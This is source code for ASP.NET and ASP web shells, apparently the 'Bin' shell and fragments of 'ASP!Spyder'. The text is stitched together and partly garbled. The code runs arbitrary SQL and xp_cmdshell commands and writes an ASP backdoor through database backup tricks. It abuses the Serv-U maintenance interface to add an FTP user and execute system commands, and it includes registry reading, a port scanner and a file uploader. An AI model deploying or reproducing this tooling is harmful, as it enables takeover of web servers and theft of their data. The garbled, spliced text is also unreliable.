Bin_DBinfoLabel.Visible=false;
}
Bin_DataGrid.Visible=true;
DataTable databind=Bin_DataTable(@"SELECT * FROM "+Session["Bin_Table"]);
Bin_DataGrid.DataSource=databind;
Bin_DataGrid.DataBind();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType=CommandType.Text;
comm.CommandText=instr;
comm.ExecuteNonQuery();
}
catch(Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{
for(int i=2; i < e.Item.Cells.Count; i++)
{
e.Item.Cells.Text=e.Item.Cells.Text.Replace("", ">");
}
}
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex=e.NewPageIndex;
Bin_Databind();
}
public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if(e.CommandName=="Cancel")
{
Bin_DataGrid.EditItemIndex=-1;
Bin_Databind();
}
}
protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Scroll.Visible=true;
Bin_DataGrid.Visible=true;
Bin_DataGrid.AllowPaging=true;
Bin_Accbind();
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
}
string sqlstr=Bin_DBstrTextBox.Text;
sqlstr=sqlstr.TrimStart().ToLower();
if(sqlstr.Substring(0, 6)=="select")
{
DataTable databind=Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource=databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_Accbind();
Bin_DBmenuPanel.Visible=true;
Bin_DataGrid.Visible=false;
Bin_DataGrid.AllowPaging=true;
Bin_Scroll.Visible=false;
Bin_DBstrTextBox.Text="";
Bin_SAexecButton.Visible=false;
Bin_ResLabel.Visible=false;
Bin_dirPanel.Visible=false;
}
protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_SAexecButton.Visible=true;
Bin_Change();
Bin_ExecButton.Visible=false;
Bin_ResLabel.Visible=false;
Session["Bin_Option"]=null;
Bin_dirPanel.Visible=false;
}
public void Bin_Change()
{
Bin_ExecButton.Visible=false;
string select="SQL Server ExecAdd sp_oacreateAdd xp_cmdshellAdd xp_cmdshellAdd xp_cmdshell(SQL2005)XP_cmdshell execSP_oamethod execSP_makewebtask make file";
if(Session["Bin_Option"] !=null)
{
select+=""+Session["Bin_Option"]+"";
}
select+="";
Bin_AccinfoLabel.Text=select;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
}
protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible=false;
Bin_ExecButton.Visible=false;
Bin_Scroll.Visible=false;
Bin_DataGrid.Visible=false;
Bin_DBmenuPanel.Visible=true;
string sqlstr=Bin_DBstrTextBox.Text;
DataTable databind=Bin_DataTable(sqlstr);
string res="";
foreach(DataRow dr in databind.Rows)
{
for(int i=0; i < databind.Columns.Count; i++)
{
res+=dr+"\r";
}
}
Bin_ResLabel.Text="
Mã:
"+res.Replace(" ", " ").Replace("", ">")+"";
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_DBinfoLabel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
}
protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_DBinfoLabel.Visible=false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible=true;
Bin_Scroll.Visible=true;
Bin_DataGrid.AllowPaging=false;
string exesql="use pubs;if exists(select * from sysobjects where id=object_id(N'[bin_dir]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400))INSERT bin_dir EXEC MASTER..XP_dirtree '"+Bin_DirTextBox.Text+"',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir=Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource=sql_dir;
Bin_DataGrid.DataBind();
}
catch(Exception e)
{
Bin_Error(e.Message);
}
}
protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=true;
Bin_IISPanel.Visible=false;
Bin_SuresLabel.Text="";
Bin_LoginPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
}
protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path=Bin_DirTextBox.Text.Trim();
if(path.Substring(path.Length - 1, 1)==@"")
{
path=path+"bin.asp";
}
else
{
path=path+@"\bin.asp";
}
string sql="if exists(select * from sysobjects where id=object_id(N'[bin_cmd]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_cmd];create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='"+path+"' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path=Bin_DirTextBox.Text.Trim();
if(path.Substring(path.Length - 1, 1)==@"")
{
path=path+"bin.asp";
}
else
{
path=path+@"\bin.asp";
}
string sql="if exists(select * from sysobjects where id=object_id(N'[bin_cmd]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_cmd];create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='"+path+"' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_BakLog();
}
protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result="";
string user=Bin_SunameTextBox.Text;
string pass=Bin_SupassTextBox.Text;
int port=Int32.Parse(Bin_SuportTextBox.Text);
string cmd=Bin_SucmdTextBox.Text;
string loginuser="user "+user+"\r\n";
string loginpass="pass "+pass+"\r\n";
string site="SITE MAINTENANCE\r\n";
string deldomain="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite="QUIT\r\n";
try
{
TcpClient tcp=new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize=1024;
NetworkStream NS=tcp.GetStream();
Result=Rev(NS);
Result+=Send(NS, loginuser);
Result+=Rev(NS);
Result+=Send(NS, loginpass);
Result+=Rev(NS);
Result+=Send(NS, site);
Result+=Rev(NS);
Result+=Send(NS, deldomain);
Result+=Rev(NS);
Result+=Send(NS, setdomain);
Result+=Rev(NS);
Result+=Send(NS, newdomain);
Result+=Rev(NS);
TcpClient tcp1=new TcpClient("127.0.0.1", 52521);
NetworkStream NS1=tcp1.GetStream();
Result+=Rev(NS1);
Result+=Send(NS1, "user bin\r\n");
Result+=Rev(NS1);
Result+=Send(NS1, "pass binftp\r\n");
Result+=Rev(NS1);
Result+=Send(NS1, "site exec "+cmd+"\r\n");
Result+=Rev(NS1);
tcp1.Close();
Result+=Send(NS, deldomain);
Result+=Rev(NS);
Result+=Send(NS, quite);
Result+=Rev(NS);
tcp.Close();
}
catch(Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text="
Mã:
"+Result+"";
}
protected string Rev(NetworkStream instream)
{
string Restr="";
if(instream.CanRead)
{
byte[] buffer=new byte[1024];
instream.Read(buffer, 0, buffer.Length);
Restr=Encoding.ASCII.GetString(buffer);
}
return ""+Restr+"
";
}
protected string Send(NetworkStream instream,string Sendstr)
{
if(instream.CanWrite)
{
byte[] buffer=Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, 0, buffer.Length);
}
return ""+Sendstr+"
";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible=false;
Bin_MainPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=true;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_iisLabel.Text=Bin_iisinfo();
}
protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=true;
Bin_ScanresLabel.Text="";
}
protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=true;
Bin_PortPanel.Visible=false;
Bin_RegresLabel.Text="";
}
protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey=Bin_KeyTextBox.Text;
string subkey=regkey.Substring(regkey.IndexOf("\")+1, regkey.Length - regkey.IndexOf("\")- 1);
RegistryKey rk=null;
object buffer;
string regstr="";
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_LOCAL_MACHINE")
{
rk=Registry.LocalMachine.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CLASSES_ROOT")
{
rk=Registry.ClassesRoot.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CURRENT_USER")
{
rk=Registry.CurrentUser.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_USERS")
{
rk=Registry.Users.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CURRENT_CONFIG")
{
rk=Registry.CurrentConfig.OpenSubKey(subkey);
}
buffer=rk.GetValue(Bin_ValueTextBox.Text, "NULL");
if (buffer.GetType()==typeof(byte[]))
{
foreach (byte tmpbyte in (byte[])buffer)
{
if ((int)tmpbyte Bin
A:link {
COLOR:#000000; TEXT-DECORATION:None
}
A:visited {
COLOR:#000000; TEXT-DECORATION:None
}
A:active {
COLOR:#000000; TEXT-DECORATION:None
}
A:hover {
COLOR:#000000; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto;
overflow:hidden
}
#su {
width:300px;
margin:0px auto;
overflow:hidden
}
#cmd {
width:500px;
margin:0px auto;
overflow:hidden
}
function Command(cmd, str)
{
var strTmp=str;
var frm=document.forms[0];
if(cmd=='del')
{
if(confirm('Del It ?'))
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
else return;
}
if(cmd=='change')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='down')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='showatt')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='edit')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
else return;
}
if(cmd=='rename' )
{
frm.goaction.value=cmd;
frm.todo.value=str+',';
str=prompt('Please input new filename:', strTmp);
if(str &&(strTmp !=str))
{
frm.todo.value+=str;
frm.submit();
}
else return;
}
if(cmd=='renamedir' )
{
frm.goaction.value=cmd;
frm.todo.value=str+',';
str=prompt('Please input new foldername:', strTmp);
if(str &&(strTmp !=str))
{
frm.todo.value+=str;
frm.submit();
}
else return;
}
if(cmd=='postdata')
{
frm.todo.value=str.value;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='changedata')
{
frm.todo.value=str.value;
frm.intext.value=str.options[str.selectedIndex].innerText
frm.goaction.value=cmd;
frm.submit();
}
}
Copyright(C)2008 Bin -> WwW.RoOTkIt.NeT.Cn
Copyright(C)2008 Bin -> WwW.RoOTkIt.NeT.Cn -> Reverse-IP
FileName :
CreationTime :
LastWriteTime :
LastAccessTime :
Path:
CmdPath : C:\Windows\System32\Cmd.exe
Argument :
/c Set
ConnString :
server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB
Path :
c:\
Name :
localadministrator
Pass :
#l@$ak#.lk;0@P
Port :
43958
CMD :
cmd.exe /c net user
KEY : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
VALUE :
ComputerName
IP :
127.0.0.1
PORT :
21,80,1433,3306,3389,4899,5631,43958,65500
File2
64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub
Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) "" Then sPath = sPath & ""
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader
' This starts the upload process
Uploader.Upload()
%>
ASPYDrvsInfo
File upload Information:
hAshish for all the help!
+++DONE+++
CLOSE THIS WINDOW
file Type:
file Size: bytes
file Created:
last Modified:
last Accessed:
file Attributes:
sub getit(thestuff)
if right("",1) "" Then
document.myform.txtpath.value = "" & "" & thestuff
Else
document.myform.txtpath.value = "" & thestuff
End If
document.myform.submit()
End sub
ASP!Spyder Apr2003
by ~sir_shagalot
PATH INFO : Volume Label:
Virtual: http://
1
[URL="Retrieve Available Network Drives[/URL]
[URL="SQL Query Analyser[/URL]
[URL="+++LOGOFF+++[/URL]
Delete file from current directory:
------------------------------"
FOLDERz
fo=fo+1
Response.Write "0 " & fold.name & "
"
Next
%>
Directory:
Copyright 2003 Vela iNC.
[ System: ]
